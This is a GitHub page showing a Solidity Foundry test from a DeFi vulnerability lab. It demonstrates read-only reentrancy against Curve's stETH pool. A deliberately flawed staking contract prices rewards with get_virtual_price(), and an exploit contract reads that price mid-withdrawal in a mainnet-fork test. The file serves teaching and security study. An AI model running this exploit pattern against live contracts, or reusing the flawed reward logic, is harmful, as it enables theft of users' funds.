forked from SunWeb3Sec/DeFiVulnLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathReadOnlyReentrancy.sol
122 lines (100 loc) · 4.08 KB
/
ReadOnlyReentrancy.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
// SPDX-License-Identifier: MIT
pragma solidity 0.8.13;
import "forge-std/Test.sol";
import "./interface.sol";
// Video Reference - https://www.youtube.com/watch?v=0fgGTRlsDxI
// forge test --contracts ./src/test/ReadOnlyReentrancy.sol -vv
interface ICurve {
function get_virtual_price() external view returns (uint);
function add_liquidity(uint[2] calldata amounts, uint min_mint_amount)
external
payable
returns (uint);
function remove_liquidity(uint lp, uint[2] calldata min_amounts)
external
returns (uint[2] memory);
function remove_liquidity_one_coin(
uint lp,
int128 i,
uint min_amount
) external returns (uint);
}
address constant STETH_POOL = 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022;
address constant LP_TOKEN = 0x06325440D014e39736583c165C2963BA99fAf14E; //steCRV Token
// VulnContract
// users stake LP_TOKEN
// getReward rewards the users based on the current price of the pool LP token
contract VulnContract {
IERC20 public constant token = IERC20(LP_TOKEN);
ICurve private constant pool = ICurve(STETH_POOL);
mapping(address => uint) public balanceOf;
function stake(uint amount) external {
token.transferFrom(msg.sender, address(this), amount);
balanceOf[msg.sender] += amount;
}
function unstake(uint amount) external {
balanceOf[msg.sender] -= amount;
token.transfer(msg.sender, amount);
}
function getReward() external returns (uint) {
//rewarding tokens based on the current virtual price of the pool LP token
uint reward = (balanceOf[msg.sender] * pool.get_virtual_price()) / 1 ether;
// Omitting code to transfer reward tokens
return reward;
}
}
contract ExploitContract {
ICurve private constant pool = ICurve(STETH_POOL);
IERC20 public constant lpToken = IERC20(LP_TOKEN);
VulnContract private immutable target;
constructor(address _target) {
target = VulnContract(_target);
}
receive() external payable { // receive() is called when the remove_liquidity is called
console.log("--------------------------------------------------------------------");
console.log("LP token price during remove_liquidity()", pool.get_virtual_price());
// Attack - Log reward amount
uint reward = target.getReward();
console.log("Reward if Read-Only Reentrancy is invoked: ", reward);
}
// Stake LP into VulnContract
function stakeTokens() external payable {
uint[2] memory amounts = [msg.value, 0];
uint lp = pool.add_liquidity{value: msg.value}(amounts, 1);
console.log("LP token price after staking into VulnContract", pool.get_virtual_price());
lpToken.approve(address(target), lp);
target.stake(lp);
}
// Perform Read-Only Reentrancy
function performReadOnlyReentrnacy() external payable {
// Add liquidity to Curve
uint[2] memory amounts = [msg.value, 0];
uint lp = pool.add_liquidity{value: msg.value}(amounts, 1);
// Log get_virtual_price
console.log("LP token price before remove_liquidity()", pool.get_virtual_price());
// Remove liquidity from Curve
// remove_liquidity() invokes the recieve() callback
uint[2] memory min_amounts = [uint(0), uint(0)];
pool.remove_liquidity(lp, min_amounts);
// Log get_virtual_price
console.log("--------------------------------------------------------------------");
console.log("LP token price after remove_liquidity()", pool.get_virtual_price());
// Attack - Log reward amount
uint reward = target.getReward();
console.log("Reward if Read-Only Reentrancy is not invoked: ", reward);
}
}
contract ExploitTest is Test {
ExploitContract public hack;
VulnContract public target;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("mainnet");
target = new VulnContract(); // deploy the vulnerable contract
hack = new ExploitContract(address(target)); // deploy attacker contract
}
function testPwn() public {
hack.stakeTokens{value: 10 ether}(); // stake 10 eth in VulnContract
hack.performReadOnlyReentrnacy{value: 100000 ether}();
}
}